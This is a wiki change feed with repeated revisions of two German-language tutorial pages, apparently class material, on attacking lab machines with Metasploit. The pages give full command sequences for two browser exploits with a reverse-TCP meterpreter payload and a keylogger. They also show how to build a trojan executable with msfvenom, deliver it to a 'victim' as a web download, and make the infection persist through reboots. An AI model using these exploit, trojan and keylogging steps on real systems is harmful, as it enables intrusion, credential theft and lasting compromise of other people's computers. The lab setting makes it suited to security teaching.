		<title>Metasploit browser Exlpoit</title>
		<link rel="alternate" type="text/html" href="https://wiki.ixheim.de/index.php?title=Metasploit_browser_Exlpoit&amp;diff=18432"/>
		<updated>2019-09-02T10:22:47Z</updated>

		<summary type="html">&lt;p&gt;Joshua.schreiner: /* on the target */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Setup target=&lt;br /&gt;
Winxp Service pack 3&lt;br /&gt;
Firefox 3.5&lt;br /&gt;
&lt;br /&gt;
=Setup Hacker=&lt;br /&gt;
Kali Linux&lt;br /&gt;
ip: 192.168.242.53&lt;br /&gt;
&lt;br /&gt;
=Action=&lt;br /&gt;
start metasploit&lt;br /&gt;
 msfconsole&lt;br /&gt;
&lt;br /&gt;
 use exploit/multi/browser/firefox_escape_retval&lt;br /&gt;
 set payload windows/meterpreter/reverse_tcp&lt;br /&gt;
 set lhost 192.168.242.53 (lokaler Host)&lt;br /&gt;
 set svrhost 192.168.242.53 (HTTP-Server IP)&lt;br /&gt;
 set svrport 8888 (HTTP-Server Port)&lt;br /&gt;
 set lport 4444 (lokaler Port)&lt;br /&gt;
 set uripath /hack (optional)&lt;br /&gt;
 exploit&lt;br /&gt;
&lt;br /&gt;
 jetzt muss das opfer mit dem fierfox diese url aufrufen http://192.168.242.53:8888/hack&lt;br /&gt;
 wenn wir meterpreter &amp;gt; sehen hat der exploit funktioniert &lt;br /&gt;
&lt;br /&gt;
 session - i 1 (in die session gehen)&lt;br /&gt;
 sessions -h (zeigt optionen)&lt;br /&gt;
 ps (zeigt prozesse)&lt;br /&gt;
 migrate PSID (verschiebt in den prozess Z.b explorer.exe)&lt;br /&gt;
 getpid (zeigt momentanen prozess)&lt;br /&gt;
 keyscan_start (startet den keyloger)&lt;br /&gt;
 keyscan_dump (zeigt aufzeichnungen)&lt;br /&gt;
 keyscan_stop (stopt keyloger)&lt;br /&gt;
&lt;br /&gt;
=Win7 32bit Exploit=&lt;br /&gt;
http://high54security.blogspot.de/2015/05/exploiting-flash-1700134-using.html&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* Setup target&lt;br /&gt;
&lt;br /&gt;
win732 bit&lt;br /&gt;
&lt;br /&gt;
adobeflash 17.0.0.134&lt;br /&gt;
&lt;br /&gt;
firefox&lt;br /&gt;
&lt;br /&gt;
TeamViewer ID 597 708 786&lt;br /&gt;
&lt;br /&gt;
==Hackersystem==&lt;br /&gt;
kali linux&lt;br /&gt;
&lt;br /&gt;
ip 192.168.244.50&lt;br /&gt;
&lt;br /&gt;
===on the console===&lt;br /&gt;
start metasploit console&lt;br /&gt;
*msfconsole&lt;br /&gt;
Selection of the exploits&lt;br /&gt;
*use exploit/windows/browser/adobe_flash_domain_memory_uaf&lt;br /&gt;
selection of malicious software&lt;br /&gt;
*set payload windows/meterpreter/reverse_tcp&lt;br /&gt;
put the localhost&lt;br /&gt;
*set lhost 192.168.244.50&lt;br /&gt;
putting the web server&lt;br /&gt;
*set srvhost 192.168.244.50&lt;br /&gt;
path to the hack&lt;br /&gt;
*set uripath /hack&lt;br /&gt;
execute the exploits&lt;br /&gt;
*exploit&lt;br /&gt;
&lt;br /&gt;
=on the target=&lt;br /&gt;
*go up with win7 to http://192.168.244.150:8080/hack&lt;br /&gt;
&lt;br /&gt;
=on the hackersystem=&lt;br /&gt;
==commandos==&lt;br /&gt;
 sessions -l (listet die sessions)&lt;br /&gt;
 sessions -i 1 (in die session gehen)&lt;br /&gt;
 sessions -h (zeigt optionen)&lt;br /&gt;
 ps (zeigt prozesse)&lt;br /&gt;
 migrate PSID (verschiebt in den prozess Z.b explorer.exe)&lt;br /&gt;
 getpid (zeigt momentanen prozess)&lt;br /&gt;
 keyscan_start (startet den keyloger)&lt;br /&gt;
 keyscan_dump (zeigt aufzeichnungen)&lt;br /&gt;
 keyscan_stop (stopt keyloger)&lt;br /&gt;
&lt;br /&gt;
==method==&lt;br /&gt;
session betreten&lt;br /&gt;
*msf exploit(adobe_flash_domain_memory_uaf) &amp;gt; sessions -i 1&lt;br /&gt;
ps listing&lt;br /&gt;
*meterpreter &amp;gt; ps&lt;/div&gt;</summary>
		<author><name>Joshua.schreiner</name></author>
	</entry>
	<entry>
		<id>https://wiki.ixheim.de/index.php?title=Metasploit_browser_Exlpoit&amp;diff=18430</id>
		<title>Metasploit browser Exlpoit</title>
		<link rel="alternate" type="text/html" href="https://wiki.ixheim.de/index.php?title=Metasploit_browser_Exlpoit&amp;diff=18430"/>
		<updated>2019-09-02T10:20:00Z</updated>

		<summary type="html">&lt;p&gt;Joshua.schreiner: /* on the console */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Setup target=&lt;br /&gt;
Winxp Service pack 3&lt;br /&gt;
Firefox 3.5&lt;br /&gt;
&lt;br /&gt;
=Setup Hacker=&lt;br /&gt;
Kali Linux&lt;br /&gt;
ip: 192.168.242.53&lt;br /&gt;
&lt;br /&gt;
=Action=&lt;br /&gt;
start metasploit&lt;br /&gt;
 msfconsole&lt;br /&gt;
&lt;br /&gt;
 use exploit/multi/browser/firefox_escape_retval&lt;br /&gt;
 set payload windows/meterpreter/reverse_tcp&lt;br /&gt;
 set lhost 192.168.242.53 (lokaler Host)&lt;br /&gt;
 set svrhost 192.168.242.53 (HTTP-Server IP)&lt;br /&gt;
 set svrport 8888 (HTTP-Server Port)&lt;br /&gt;
 set lport 4444 (lokaler Port)&lt;br /&gt;
 set uripath /hack (optional)&lt;br /&gt;
 exploit&lt;br /&gt;
&lt;br /&gt;
 jetzt muss das opfer mit dem fierfox diese url aufrufen http://192.168.242.53:8888/hack&lt;br /&gt;
 wenn wir meterpreter &amp;gt; sehen hat der exploit funktioniert &lt;br /&gt;
&lt;br /&gt;
 session - i 1 (in die session gehen)&lt;br /&gt;
 sessions -h (zeigt optionen)&lt;br /&gt;
 ps (zeigt prozesse)&lt;br /&gt;
 migrate PSID (verschiebt in den prozess Z.b explorer.exe)&lt;br /&gt;
 getpid (zeigt momentanen prozess)&lt;br /&gt;
 keyscan_start (startet den keyloger)&lt;br /&gt;
 keyscan_dump (zeigt aufzeichnungen)&lt;br /&gt;
 keyscan_stop (stopt keyloger)&lt;br /&gt;
&lt;br /&gt;
=Win7 32bit Exploit=&lt;br /&gt;
http://high54security.blogspot.de/2015/05/exploiting-flash-1700134-using.html&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* Setup target&lt;br /&gt;
&lt;br /&gt;
win732 bit&lt;br /&gt;
&lt;br /&gt;
adobeflash 17.0.0.134&lt;br /&gt;
&lt;br /&gt;
firefox&lt;br /&gt;
&lt;br /&gt;
TeamViewer ID 597 708 786&lt;br /&gt;
&lt;br /&gt;
==Hackersystem==&lt;br /&gt;
kali linux&lt;br /&gt;
&lt;br /&gt;
ip 192.168.244.50&lt;br /&gt;
&lt;br /&gt;
===on the console===&lt;br /&gt;
start metasploit console&lt;br /&gt;
*msfconsole&lt;br /&gt;
Selection of the exploits&lt;br /&gt;
*use exploit/windows/browser/adobe_flash_domain_memory_uaf&lt;br /&gt;
selection of malicious software&lt;br /&gt;
*set payload windows/meterpreter/reverse_tcp&lt;br /&gt;
put the localhost&lt;br /&gt;
*set lhost 192.168.244.50&lt;br /&gt;
putting the web server&lt;br /&gt;
*set srvhost 192.168.244.50&lt;br /&gt;
path to the hack&lt;br /&gt;
*set uripath /hack&lt;br /&gt;
execute the exploits&lt;br /&gt;
*exploit&lt;br /&gt;
&lt;br /&gt;
=on the target=&lt;br /&gt;
*gehen mit win7 auf http://192.168.244.150:8080/hack&lt;br /&gt;
&lt;br /&gt;
=on the hackersystem=&lt;br /&gt;
==commandos==&lt;br /&gt;
 sessions -l (listet die sessions)&lt;br /&gt;
 sessions -i 1 (in die session gehen)&lt;br /&gt;
 sessions -h (zeigt optionen)&lt;br /&gt;
 ps (zeigt prozesse)&lt;br /&gt;
 migrate PSID (verschiebt in den prozess Z.b explorer.exe)&lt;br /&gt;
 getpid (zeigt momentanen prozess)&lt;br /&gt;
 keyscan_start (startet den keyloger)&lt;br /&gt;
 keyscan_dump (zeigt aufzeichnungen)&lt;br /&gt;
 keyscan_stop (stopt keyloger)&lt;br /&gt;
&lt;br /&gt;
==method==&lt;br /&gt;
session betreten&lt;br /&gt;
*msf exploit(adobe_flash_domain_memory_uaf) &amp;gt; sessions -i 1&lt;br /&gt;
ps listing&lt;br /&gt;
*meterpreter &amp;gt; ps&lt;/div&gt;</summary>
		<author><name>Joshua.schreiner</name></author>
	</entry>
	<entry>
		<id>https://wiki.ixheim.de/index.php?title=Metasploit_browser_Exlpoit&amp;diff=18429</id>
		<title>Metasploit browser Exlpoit</title>
		<link rel="alternate" type="text/html" href="https://wiki.ixheim.de/index.php?title=Metasploit_browser_Exlpoit&amp;diff=18429"/>
		<updated>2019-09-02T10:16:40Z</updated>

		<summary type="html">&lt;p&gt;Joshua.schreiner: /* Win7 32bit Exploit */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Setup target=&lt;br /&gt;
Winxp Service pack 3&lt;br /&gt;
Firefox 3.5&lt;br /&gt;
&lt;br /&gt;
=Setup Hacker=&lt;br /&gt;
Kali Linux&lt;br /&gt;
ip: 192.168.242.53&lt;br /&gt;
&lt;br /&gt;
=Action=&lt;br /&gt;
start metasploit&lt;br /&gt;
 msfconsole&lt;br /&gt;
&lt;br /&gt;
 use exploit/multi/browser/firefox_escape_retval&lt;br /&gt;
 set payload windows/meterpreter/reverse_tcp&lt;br /&gt;
 set lhost 192.168.242.53 (lokaler Host)&lt;br /&gt;
 set svrhost 192.168.242.53 (HTTP-Server IP)&lt;br /&gt;
 set svrport 8888 (HTTP-Server Port)&lt;br /&gt;
 set lport 4444 (lokaler Port)&lt;br /&gt;
 set uripath /hack (optional)&lt;br /&gt;
 exploit&lt;br /&gt;
&lt;br /&gt;
 jetzt muss das opfer mit dem fierfox diese url aufrufen http://192.168.242.53:8888/hack&lt;br /&gt;
 wenn wir meterpreter &amp;gt; sehen hat der exploit funktioniert &lt;br /&gt;
&lt;br /&gt;
 session - i 1 (in die session gehen)&lt;br /&gt;
 sessions -h (zeigt optionen)&lt;br /&gt;
 ps (zeigt prozesse)&lt;br /&gt;
 migrate PSID (verschiebt in den prozess Z.b explorer.exe)&lt;br /&gt;
 getpid (zeigt momentanen prozess)&lt;br /&gt;
 keyscan_start (startet den keyloger)&lt;br /&gt;
 keyscan_dump (zeigt aufzeichnungen)&lt;br /&gt;
 keyscan_stop (stopt keyloger)&lt;br /&gt;
&lt;br /&gt;
=Win7 32bit Exploit=&lt;br /&gt;
http://high54security.blogspot.de/2015/05/exploiting-flash-1700134-using.html&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* Setup target&lt;br /&gt;
&lt;br /&gt;
win732 bit&lt;br /&gt;
&lt;br /&gt;
adobeflash 17.0.0.134&lt;br /&gt;
&lt;br /&gt;
firefox&lt;br /&gt;
&lt;br /&gt;
TeamViewer ID 597 708 786&lt;br /&gt;
&lt;br /&gt;
==Hackersystem==&lt;br /&gt;
kali linux&lt;br /&gt;
&lt;br /&gt;
ip 192.168.244.50&lt;br /&gt;
&lt;br /&gt;
===on the console===&lt;br /&gt;
metasploit konsole starten&lt;br /&gt;
*msfconsole&lt;br /&gt;
auswahl des exploits&lt;br /&gt;
*use exploit/windows/browser/adobe_flash_domain_memory_uaf&lt;br /&gt;
auswahl der schadsoftware&lt;br /&gt;
*set payload windows/meterpreter/reverse_tcp&lt;br /&gt;
setzen des localhost&lt;br /&gt;
*set lhost 192.168.244.50&lt;br /&gt;
setzen des webservers&lt;br /&gt;
*set srvhost 192.168.244.50&lt;br /&gt;
pfad zum hack&lt;br /&gt;
*set uripath /hack&lt;br /&gt;
ausführen des exploits&lt;br /&gt;
*exploit&lt;br /&gt;
&lt;br /&gt;
=on the target=&lt;br /&gt;
*gehen mit win7 auf http://192.168.244.150:8080/hack&lt;br /&gt;
&lt;br /&gt;
=on the hackersystem=&lt;br /&gt;
==commandos==&lt;br /&gt;
 sessions -l (listet die sessions)&lt;br /&gt;
 sessions -i 1 (in die session gehen)&lt;br /&gt;
 sessions -h (zeigt optionen)&lt;br /&gt;
 ps (zeigt prozesse)&lt;br /&gt;
 migrate PSID (verschiebt in den prozess Z.b explorer.exe)&lt;br /&gt;
 getpid (zeigt momentanen prozess)&lt;br /&gt;
 keyscan_start (startet den keyloger)&lt;br /&gt;
 keyscan_dump (zeigt aufzeichnungen)&lt;br /&gt;
 keyscan_stop (stopt keyloger)&lt;br /&gt;
&lt;br /&gt;
==method==&lt;br /&gt;
session betreten&lt;br /&gt;
*msf exploit(adobe_flash_domain_memory_uaf) &amp;gt; sessions -i 1&lt;br /&gt;
ps listing&lt;br /&gt;
*meterpreter &amp;gt; ps&lt;/div&gt;</summary>
		<author><name>Joshua.schreiner</name></author>
	</entry>
	<entry>
		<id>https://wiki.ixheim.de/index.php?title=Metasploit_browser_Exlpoit&amp;diff=18426</id>
		<title>Metasploit browser Exlpoit</title>
		<link rel="alternate" type="text/html" href="https://wiki.ixheim.de/index.php?title=Metasploit_browser_Exlpoit&amp;diff=18426"/>
		<updated>2019-09-02T10:15:25Z</updated>

		<summary type="html">&lt;p&gt;Joshua.schreiner: /* Action */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Setup target=&lt;br /&gt;
Winxp Service pack 3&lt;br /&gt;
Firefox 3.5&lt;br /&gt;
&lt;br /&gt;
=Setup Hacker=&lt;br /&gt;
Kali Linux&lt;br /&gt;
ip: 192.168.242.53&lt;br /&gt;
&lt;br /&gt;
=Action=&lt;br /&gt;
start metasploit&lt;br /&gt;
 msfconsole&lt;br /&gt;
&lt;br /&gt;
 use exploit/multi/browser/firefox_escape_retval&lt;br /&gt;
 set payload windows/meterpreter/reverse_tcp&lt;br /&gt;
 set lhost 192.168.242.53 (lokaler Host)&lt;br /&gt;
 set svrhost 192.168.242.53 (HTTP-Server IP)&lt;br /&gt;
 set svrport 8888 (HTTP-Server Port)&lt;br /&gt;
 set lport 4444 (lokaler Port)&lt;br /&gt;
 set uripath /hack (optional)&lt;br /&gt;
 exploit&lt;br /&gt;
&lt;br /&gt;
 jetzt muss das opfer mit dem fierfox diese url aufrufen http://192.168.242.53:8888/hack&lt;br /&gt;
 wenn wir meterpreter &amp;gt; sehen hat der exploit funktioniert &lt;br /&gt;
&lt;br /&gt;
 session - i 1 (in die session gehen)&lt;br /&gt;
 sessions -h (zeigt optionen)&lt;br /&gt;
 ps (zeigt prozesse)&lt;br /&gt;
 migrate PSID (verschiebt in den prozess Z.b explorer.exe)&lt;br /&gt;
 getpid (zeigt momentanen prozess)&lt;br /&gt;
 keyscan_start (startet den keyloger)&lt;br /&gt;
 keyscan_dump (zeigt aufzeichnungen)&lt;br /&gt;
 keyscan_stop (stopt keyloger)&lt;br /&gt;
&lt;br /&gt;
=Win7 32bit Exploit=&lt;br /&gt;
http://high54security.blogspot.de/2015/05/exploiting-flash-1700134-using.html&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* Setup Opfer&lt;br /&gt;
&lt;br /&gt;
win732 bit&lt;br /&gt;
&lt;br /&gt;
adobeflash 17.0.0.134&lt;br /&gt;
&lt;br /&gt;
firefox&lt;br /&gt;
&lt;br /&gt;
TeamViewer ID 597 708 786&lt;br /&gt;
&lt;br /&gt;
==Hackersystem==&lt;br /&gt;
kali linux&lt;br /&gt;
&lt;br /&gt;
ip 192.168.244.50&lt;br /&gt;
&lt;br /&gt;
===on the console===&lt;br /&gt;
metasploit konsole starten&lt;br /&gt;
*msfconsole&lt;br /&gt;
auswahl des exploits&lt;br /&gt;
*use exploit/windows/browser/adobe_flash_domain_memory_uaf&lt;br /&gt;
auswahl der schadsoftware&lt;br /&gt;
*set payload windows/meterpreter/reverse_tcp&lt;br /&gt;
setzen des localhost&lt;br /&gt;
*set lhost 192.168.244.50&lt;br /&gt;
setzen des webservers&lt;br /&gt;
*set srvhost 192.168.244.50&lt;br /&gt;
pfad zum hack&lt;br /&gt;
*set uripath /hack&lt;br /&gt;
ausführen des exploits&lt;br /&gt;
*exploit&lt;br /&gt;
&lt;br /&gt;
=on the target=&lt;br /&gt;
*gehen mit win7 auf http://192.168.244.150:8080/hack&lt;br /&gt;
&lt;br /&gt;
=on the hackersystem=&lt;br /&gt;
==commandos==&lt;br /&gt;
 sessions -l (listet die sessions)&lt;br /&gt;
 sessions -i 1 (in die session gehen)&lt;br /&gt;
 sessions -h (zeigt optionen)&lt;br /&gt;
 ps (zeigt prozesse)&lt;br /&gt;
 migrate PSID (verschiebt in den prozess Z.b explorer.exe)&lt;br /&gt;
 getpid (zeigt momentanen prozess)&lt;br /&gt;
 keyscan_start (startet den keyloger)&lt;br /&gt;
 keyscan_dump (zeigt aufzeichnungen)&lt;br /&gt;
 keyscan_stop (stopt keyloger)&lt;br /&gt;
&lt;br /&gt;
==method==&lt;br /&gt;
session betreten&lt;br /&gt;
*msf exploit(adobe_flash_domain_memory_uaf) &amp;gt; sessions -i 1&lt;br /&gt;
ps listing&lt;br /&gt;
*meterpreter &amp;gt; ps&lt;/div&gt;</summary>
		<author><name>Joshua.schreiner</name></author>
	</entry>
	<entry>
		<id>https://wiki.ixheim.de/index.php?title=Metasploit_browser_Exlpoit&amp;diff=18425</id>
		<title>Metasploit browser Exlpoit</title>
		<link rel="alternate" type="text/html" href="https://wiki.ixheim.de/index.php?title=Metasploit_browser_Exlpoit&amp;diff=18425"/>
		<updated>2019-09-02T10:14:46Z</updated>

		<summary type="html">&lt;p&gt;Joshua.schreiner: /* Setup Opfer */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Setup target=&lt;br /&gt;
Winxp Service pack 3&lt;br /&gt;
Firefox 3.5&lt;br /&gt;
&lt;br /&gt;
=Setup Hacker=&lt;br /&gt;
Kali Linux&lt;br /&gt;
ip: 192.168.242.53&lt;br /&gt;
&lt;br /&gt;
=Action=&lt;br /&gt;
starte metasploit&lt;br /&gt;
 msfconsole&lt;br /&gt;
&lt;br /&gt;
 use exploit/multi/browser/firefox_escape_retval&lt;br /&gt;
 set payload windows/meterpreter/reverse_tcp&lt;br /&gt;
 set lhost 192.168.242.53 (lokaler Host)&lt;br /&gt;
 set svrhost 192.168.242.53 (HTTP-Server IP)&lt;br /&gt;
 set svrport 8888 (HTTP-Server Port)&lt;br /&gt;
 set lport 4444 (lokaler Port)&lt;br /&gt;
 set uripath /hack (optional)&lt;br /&gt;
 exploit&lt;br /&gt;
&lt;br /&gt;
 jetzt muss das opfer mit dem fierfox diese url aufrufen http://192.168.242.53:8888/hack&lt;br /&gt;
 wenn wir meterpreter &amp;gt; sehen hat der exploit funktioniert &lt;br /&gt;
&lt;br /&gt;
 session - i 1 (in die session gehen)&lt;br /&gt;
 sessions -h (zeigt optionen)&lt;br /&gt;
 ps (zeigt prozesse)&lt;br /&gt;
 migrate PSID (verschiebt in den prozess Z.b explorer.exe)&lt;br /&gt;
 getpid (zeigt momentanen prozess)&lt;br /&gt;
 keyscan_start (startet den keyloger)&lt;br /&gt;
 keyscan_dump (zeigt aufzeichnungen)&lt;br /&gt;
 keyscan_stop (stopt keyloger)&lt;br /&gt;
&lt;br /&gt;
=Win7 32bit Exploit=&lt;br /&gt;
http://high54security.blogspot.de/2015/05/exploiting-flash-1700134-using.html&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* Setup Opfer&lt;br /&gt;
&lt;br /&gt;
win732 bit&lt;br /&gt;
&lt;br /&gt;
adobeflash 17.0.0.134&lt;br /&gt;
&lt;br /&gt;
firefox&lt;br /&gt;
&lt;br /&gt;
TeamViewer ID 597 708 786&lt;br /&gt;
&lt;br /&gt;
==Hackersystem==&lt;br /&gt;
kali linux&lt;br /&gt;
&lt;br /&gt;
ip 192.168.244.50&lt;br /&gt;
&lt;br /&gt;
===on the console===&lt;br /&gt;
metasploit konsole starten&lt;br /&gt;
*msfconsole&lt;br /&gt;
auswahl des exploits&lt;br /&gt;
*use exploit/windows/browser/adobe_flash_domain_memory_uaf&lt;br /&gt;
auswahl der schadsoftware&lt;br /&gt;
*set payload windows/meterpreter/reverse_tcp&lt;br /&gt;
setzen des localhost&lt;br /&gt;
*set lhost 192.168.244.50&lt;br /&gt;
setzen des webservers&lt;br /&gt;
*set srvhost 192.168.244.50&lt;br /&gt;
pfad zum hack&lt;br /&gt;
*set uripath /hack&lt;br /&gt;
ausführen des exploits&lt;br /&gt;
*exploit&lt;br /&gt;
&lt;br /&gt;
=on the target=&lt;br /&gt;
*gehen mit win7 auf http://192.168.244.150:8080/hack&lt;br /&gt;
&lt;br /&gt;
=on the hackersystem=&lt;br /&gt;
==commandos==&lt;br /&gt;
 sessions -l (listet die sessions)&lt;br /&gt;
 sessions -i 1 (in die session gehen)&lt;br /&gt;
 sessions -h (zeigt optionen)&lt;br /&gt;
 ps (zeigt prozesse)&lt;br /&gt;
 migrate PSID (verschiebt in den prozess Z.b explorer.exe)&lt;br /&gt;
 getpid (zeigt momentanen prozess)&lt;br /&gt;
 keyscan_start (startet den keyloger)&lt;br /&gt;
 keyscan_dump (zeigt aufzeichnungen)&lt;br /&gt;
 keyscan_stop (stopt keyloger)&lt;br /&gt;
&lt;br /&gt;
==method==&lt;br /&gt;
session betreten&lt;br /&gt;
*msf exploit(adobe_flash_domain_memory_uaf) &amp;gt; sessions -i 1&lt;br /&gt;
ps listing&lt;br /&gt;
*meterpreter &amp;gt; ps&lt;/div&gt;</summary>
		<author><name>Joshua.schreiner</name></author>
	</entry>
	<entry>
		<id>https://wiki.ixheim.de/index.php?title=Metasploit_%26_armitage_trojaner&amp;diff=18424</id>
		<title>Metasploit &amp; armitage trojaner</title>
		<link rel="alternate" type="text/html" href="https://wiki.ixheim.de/index.php?title=Metasploit_%26_armitage_trojaner&amp;diff=18424"/>
		<updated>2019-09-02T10:04:32Z</updated>

		<summary type="html">&lt;p&gt;Joshua.schreiner: /* kurz Beispiel keylogger */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Setup Hacker &lt;br /&gt;
 Kali linux&lt;br /&gt;
 ip:  192.168.242.91&lt;br /&gt;
&lt;br /&gt;
Setup Opfer&lt;br /&gt;
 Windows 7 Domain Rechner&lt;br /&gt;
 Benutzer: Admin&lt;br /&gt;
 ip:  192.168.242.76&lt;br /&gt;
&lt;br /&gt;
=Create trojan=&lt;br /&gt;
*LHOST=&amp;quot;10.81.1.1&amp;quot;&lt;br /&gt;
*LPORT=&amp;quot;7777&amp;quot;&lt;br /&gt;
LHOST ist der Rechner den der Client spaeter connecten ...&lt;br /&gt;
*msfvenom -p windows/meterpreter/reverse_tcp LHOST=$LHOST LPORT=$LPORT --format=exe &amp;gt; program.exe&lt;br /&gt;
&lt;br /&gt;
[[Datei:7 trojaner.png]]&lt;br /&gt;
&lt;br /&gt;
=defer the program to the target=&lt;br /&gt;
das opfer muss dazu gebracht werden das Programm auszuführen wir bieten in diesem beispiel einfach die Datei als download an&lt;br /&gt;
&lt;br /&gt;
 cp program.exe /var/www/html/&lt;br /&gt;
 rm /var/www/html/index.html&lt;br /&gt;
 ifconfig&lt;br /&gt;
 netstat -lntp&lt;br /&gt;
 service apache2 restart &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Datei:8 opfer.png]]&lt;br /&gt;
&lt;br /&gt;
auf der opfer Seite&lt;br /&gt;
&lt;br /&gt;
[[Datei:12 schadeware.png]]&lt;br /&gt;
&lt;br /&gt;
=take control=&lt;br /&gt;
&lt;br /&gt;
nun starten wir erst metasploit und danach armitage (linke leiste)&lt;br /&gt;
&lt;br /&gt;
[[Datei:mframe.png]]&lt;br /&gt;
&lt;br /&gt;
Standard Einstellung beibehalten weitere Meldungen einfach bestätigen&lt;br /&gt;
&lt;br /&gt;
[[Datei:amriamstarten.png]]&lt;br /&gt;
&lt;br /&gt;
[[Datei:1armitagestarten.png]]&lt;br /&gt;
&lt;br /&gt;
wenn armitage gestartet ist erstellen wir einen Server zum lauschen&lt;br /&gt;
*payload&lt;br /&gt;
**windows&lt;br /&gt;
***metapreter&lt;br /&gt;
&lt;br /&gt;
hier passen wir den LPORT an&lt;br /&gt;
&lt;br /&gt;
und warten darauf das sich unser opfer verbindet&lt;br /&gt;
&lt;br /&gt;
nun erscheint oben rechts der opfer Computer&lt;br /&gt;
&lt;br /&gt;
(durch links klick auswählen)&lt;br /&gt;
&lt;br /&gt;
=Permanently infect=&lt;br /&gt;
&lt;br /&gt;
als nächstes wollen wir den Trojaner dauerhaft speichern &lt;br /&gt;
&lt;br /&gt;
wir suchen nach persist (mit Doppelklick auswählen) und geben einen neuen Port an&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Datei:200persist.png]]&lt;br /&gt;
&lt;br /&gt;
wen der Computer nun neugestartet wird müssen wir nur auf dem neuen Port lauschen und werden wieder verbunden&lt;br /&gt;
&lt;br /&gt;
diese kann ein par Minuten dauern&lt;br /&gt;
&lt;br /&gt;
=What can you do=&lt;br /&gt;
jetzt gibt es viele Möglichkeiten&lt;br /&gt;
*Rechtsklick infizierter pc&lt;br /&gt;
**meterpreter&lt;br /&gt;
***explore&lt;br /&gt;
hier können wir uns Prozesse oder Dateien anzeigen lassen andere Prozesse infizieren oder einen keylogger installieren usw&lt;br /&gt;
&lt;br /&gt;
=short example keylogger=&lt;br /&gt;
&lt;br /&gt;
[[metasploit &amp;amp; armitage keylogger]]&lt;/div&gt;</summary>
		<author><name>Joshua.schreiner</name></author>
	</entry>
	<entry>
		<id>https://wiki.ixheim.de/index.php?title=Metasploit_%26_armitage_trojaner&amp;diff=18423</id>
		<title>Metasploit &amp; armitage trojaner</title>
		<link rel="alternate" type="text/html" href="https://wiki.ixheim.de/index.php?title=Metasploit_%26_armitage_trojaner&amp;diff=18423"/>
		<updated>2019-09-02T10:04:06Z</updated>

		<summary type="html">&lt;p&gt;Joshua.schreiner: /* Was kann man machen */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Setup Hacker &lt;br /&gt;
 Kali linux&lt;br /&gt;
 ip:  192.168.242.91&lt;br /&gt;
&lt;br /&gt;
Setup Opfer&lt;br /&gt;
 Windows 7 Domain Rechner&lt;br /&gt;
 Benutzer: Admin&lt;br /&gt;
 ip:  192.168.242.76&lt;br /&gt;
&lt;br /&gt;
=Create trojan=&lt;br /&gt;
*LHOST=&amp;quot;10.81.1.1&amp;quot;&lt;br /&gt;
*LPORT=&amp;quot;7777&amp;quot;&lt;br /&gt;
LHOST ist der Rechner den der Client spaeter connecten ...&lt;br /&gt;
*msfvenom -p windows/meterpreter/reverse_tcp LHOST=$LHOST LPORT=$LPORT --format=exe &amp;gt; program.exe&lt;br /&gt;
&lt;br /&gt;
[[Datei:7 trojaner.png]]&lt;br /&gt;
&lt;br /&gt;
=defer the program to the target=&lt;br /&gt;
das opfer muss dazu gebracht werden das Programm auszuführen wir bieten in diesem beispiel einfach die Datei als download an&lt;br /&gt;
&lt;br /&gt;
 cp program.exe /var/www/html/&lt;br /&gt;
 rm /var/www/html/index.html&lt;br /&gt;
 ifconfig&lt;br /&gt;
 netstat -lntp&lt;br /&gt;
 service apache2 restart &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Datei:8 opfer.png]]&lt;br /&gt;
&lt;br /&gt;
auf der opfer Seite&lt;br /&gt;
&lt;br /&gt;
[[Datei:12 schadeware.png]]&lt;br /&gt;
&lt;br /&gt;
=take control=&lt;br /&gt;
&lt;br /&gt;
nun starten wir erst metasploit und danach armitage (linke leiste)&lt;br /&gt;
&lt;br /&gt;
[[Datei:mframe.png]]&lt;br /&gt;
&lt;br /&gt;
Standard Einstellung beibehalten weitere Meldungen einfach bestätigen&lt;br /&gt;
&lt;br /&gt;
[[Datei:amriamstarten.png]]&lt;br /&gt;
&lt;br /&gt;
[[Datei:1armitagestarten.png]]&lt;br /&gt;
&lt;br /&gt;
wenn armitage gestartet ist erstellen wir einen Server zum lauschen&lt;br /&gt;
*payload&lt;br /&gt;
**windows&lt;br /&gt;
***metapreter&lt;br /&gt;
&lt;br /&gt;
hier passen wir den LPORT an&lt;br /&gt;
&lt;br /&gt;
und warten darauf das sich unser opfer verbindet&lt;br /&gt;
&lt;br /&gt;
nun erscheint oben rechts der opfer Computer&lt;br /&gt;
&lt;br /&gt;
(durch links klick auswählen)&lt;br /&gt;
&lt;br /&gt;
=Permanently infect=&lt;br /&gt;
&lt;br /&gt;
als nächstes wollen wir den Trojaner dauerhaft speichern &lt;br /&gt;
&lt;br /&gt;
wir suchen nach persist (mit Doppelklick auswählen) und geben einen neuen Port an&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Datei:200persist.png]]&lt;br /&gt;
&lt;br /&gt;
wen der Computer nun neugestartet wird müssen wir nur auf dem neuen Port lauschen und werden wieder verbunden&lt;br /&gt;
&lt;br /&gt;
diese kann ein par Minuten dauern&lt;br /&gt;
&lt;br /&gt;
=What can you do=&lt;br /&gt;
jetzt gibt es viele Möglichkeiten&lt;br /&gt;
*Rechtsklick infizierter pc&lt;br /&gt;
**meterpreter&lt;br /&gt;
***explore&lt;br /&gt;
hier können wir uns Prozesse oder Dateien anzeigen lassen andere Prozesse infizieren oder einen keylogger installieren usw&lt;br /&gt;
&lt;br /&gt;
=kurz Beispiel keylogger=&lt;br /&gt;
&lt;br /&gt;
[[metasploit &amp;amp; armitage keylogger]]&lt;/div&gt;</summary>
		<author><name>Joshua.schreiner</name></author>
	</entry>
	<entry>
		<id>https://wiki.ixheim.de/index.php?title=Metasploit_%26_armitage_trojaner&amp;diff=18422</id>
		<title>Metasploit &amp; armitage trojaner</title>
